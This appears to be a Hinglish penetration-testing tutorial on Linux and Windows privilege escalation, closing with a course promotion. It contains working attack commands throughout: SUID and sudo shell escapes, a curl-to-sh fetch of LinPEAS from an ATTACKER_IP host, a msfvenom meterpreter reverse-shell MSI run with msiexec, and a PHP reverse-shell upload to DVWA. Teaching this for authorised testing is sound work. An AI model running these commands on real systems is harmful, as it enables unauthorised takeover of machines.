Privilege Escalation Tutorial: Linux and Windows Complete Guide
Privilege escalation penetration testing aur ethical hacking ka critical phase hai. Jab aapko kisi system par initial access milta hai, toh privilege escalation se aap higher privileges (root/admin) gain karte hain. Yeh privilege escalation tutorial aapko Linux aur Windows dono platforms par escalation techniques sikhayega.
Privilege Escalation Kya Hai
Privilege escalation ek attack phase hai jahan attacker limited user account se higher privileges gain karta hai. Initial access usually low-privileged user ya service account se hoti hai.
Do types hain:
Vertical Privilege Escalation (Privilege Elevation) — low privilege user se high privilege (root/admin) gain karna. Horizontal Privilege Escalation — same privilege level ka doosre user ka data access karna.
Linux Privilege Escalation
Initial Enumeration Commands
Sabse pehle system ke baare mein information gather karein:
```bash
uname -a # Kernel version aur OS details
cat /etc/issue # OS version
cat /etc/*release # Release information
hostname # System hostname
id # Current user aur groups
whoami # Current username
```
User and Group Enumeration
```bash
id # User ID, group ID, groups
whoami # Username
sudo -l # Sudo permissions (password maayega)
cat /etc/passwd # All users list
cat /etc/group # All groups
ls -la /home/ # User home directories
ls -la /var/mail/ # Mail files
```
Sudo Permissions Exploitation
```bash
sudo -l
```
Yeh command bataayega ki current user konse commands sudo ke saath run kar sakta hai bina password ke.
GTFOBins (gtfobins.github.io) reference ke liye best resource hai — har command ke privilege escalation possibilities batata hai.
Example: nmap with sudo:
```bash
sudo nmap --interactive
!sh
```
Interactive nmap se root shell mil sakta hai.
SUID Binary Exploitation
SUID (Set User ID) binaries special permissions hain jo kisi file ko uske owner ki privileges par run karte hain.
SUID binaries find karein:
```bash
find / -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 2>/dev/null
```
Common exploitable SUID binaries:
- nmap (interactive mode)
- vim (shell access)
- find (-exec)
- bash (-p flag)
- less/more (!/bin/sh)
- perl (-e 'exec "/bin/sh"')
- python (-c 'import os; os.system("/bin/sh")')
Cron Jobs Exploitation
```bash
cat /etc/crontab
ls -la /etc/cron.d/
cat /etc/cron.daily/*
```
World-writable cron scripts find karein:
```bash
find /etc/cron.d -type f -perm -o+w 2>/dev/null
```
Cron mein path hijacking bhi possible hai agar script absolute path use nahi karta.
Kernel Exploits
Kernel exploits powerful lekin risky hain — system crash ho sakta hai.
```bash
searchsploit linux kernel <version>
uname -r
```
Kernel exploits search karein. Important: Production systems par kernel exploits test na karein.
Automated Tools: LinPEAS
LinPEAS (linux-exploit-suggester) automated enumeration aur privilege escalation vectors find karta hai.
Download aur run karein:
```bash
curl -L http://ATTACKER_IP/linpeas.sh | sh
```
LinPEAS color-coded output deta hai jo potential vulnerabilities ko highlight karta hai.
Windows Privilege Escalation
Initial Enumeration
System information gather karein:
```bash
systeminfo
echo %username%
hostname
whoami /priv
whoami /all
net user
net localgroup administrators
```
Service Enumeration
Running services check karein:
```bash
sc query
tasklist /svc
wmic product get name
```
AlwaysInstallElevated Registry Key
```bash
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
Agar enabled hai (value 1):
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi -o malicious.msi
msiexec /quiet /qn /i malicious.msi
```
Unquoted Service Paths
Services jin ki path quotes mein nahi hai unhe exploit kiya ja sakta hai.
```bash
wmic service get name,displayname,pathname,startmode | findstr /i "Running" | findstr /i "Auto"
sc qc "ServiceName"
```
Example: Agar service path hai "C:\Program Files\My App\app.exe", toh attacker "C:\Program.exe" ya "C:\Program Files\My.exe" create kar sakta hai.
Stored Credentials Exploitation
Saved credentials check karein:
```bash
cmdkey /list
runas /savecred /user:admin cmd.exe
```
Service Permissions Exploitation
AccessChk tool use karein:
```bash
accesschk.exe -uwcqv "Authenticated Users" *
```
Weak service permissions find karein. Jis service par current user modify kar sakta hai uski executable ko replace karein.
Automated Tools: WinPEAS
WinPEAS Windows privilege escalation automation ke liye:
```bash
winpeas.exe
PowerUp.ps1
WES-NG (Windows Exploit Suggester Next Generation)
```
Practical Lab: DVWA Privilege Escalation
DVWA Low Security par yeh privilege escalation scenarios practice karein:
Upload Shell and Escalate
DVWA File Upload vulnerability use karein. PHP reverse shell upload karein. Metasploit handler setup karein. Shell receive karein — www-data user milega. Phir privilege escalation karein:
```bash
# Linux privilege escalation from www-data
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/passwd
```
Metasploit Meterpreter Escalation
Meterpreter session milne ke baad:
```bash
getuid # Current user
sysinfo # System info
getprivs # Available privileges
getsystem # Automatic privilege escalation
```
Getsystem automated technique hai jo multiple methods try karta hai.
Privilege Escalation Methodology
Systematic approach follow karein:
Enumerate
Information gather karein systematically. Users, services, cron jobs, SUID binaries, network configuration sab check karein.
Identify
Potential privilege escalation vectors identify karein. GTFOBins aur LOLBAS references use karein.
Exploit
Identified vector ko exploit karein controlled lab environment mein. POC (Proof of Concept) create karein.
Escalate
Higher privileges gain karein. Root/admin shell achieve karein.
Document
PoC document karein screenshots aur commands ke saath reporting ke liye.
Common Privilege Escalation Vectors Summary
Linux
SUID binaries misconfigurations bahut common hain. Sudo permissions overexposure bhi frequent issue hai. Cron jobs with writable scripts exploit kiye ja sakte hain. Kernel exploits older kernels par work karte hain. NFS share misconfigurations bhi vector ban sakte hain. Password reuse across services bhi common vulnerability hai.
Windows
AlwaysInstallElevated registry keys exploitable hain. Unquoted service paths hijack kiye ja sakte hain. Service binary permissions weak hote hain. Stored credentials accessible hote hain. DLL hijacking older applications mein common hai. Token manipulation aur SeImpersonatePrivilege exploitation bhi possible hai.
Prevention Strategies
For System Administrators
Least privilege principle follow karein. Sudo configurations properly manage karein. Regular patching critical hai. SUID binaries ki list regularly review karein. Monitoring aur logging implement karein. Security baselines apply karein.
For Developers
Secure coding practices follow karein. Input validation har jagah karein. Hardcoded credentials na rakhein. Secure file permissions set karein.
Privilege Escalation Tutorial Summary
Privilege escalation penetration testing ka critical phase hai. Is tutorial mein cover kiya:
- Linux privilege escalation — SUID, sudo, cron, kernel exploits
- Windows privilege escalation — services, AlwaysInstallElevated, stored credentials
- Automated tools — LinPEAS, WinPEAS, PowerUp
- Practical lab scenarios DVWA mein
- Systematic methodology aur prevention strategies
Privilege escalation seekhna requires practice aur systematic approach hai. TryHackMe aur HackTheBox par dedicated privilege escalation machines hain jinhe solve karein. Regular enumeration practice karein taaki vectors quickly identify kar sakein.
Cyber Defence ka ethical hacking course privilege escalation ko comprehensively cover karta hai hands-on labs ke saath. Metasploit tutorial bhi available hai jo post-exploitation techniques aur meterpreter commands detail mein sikhaata hai. Practical experience is field mein success ki key hai.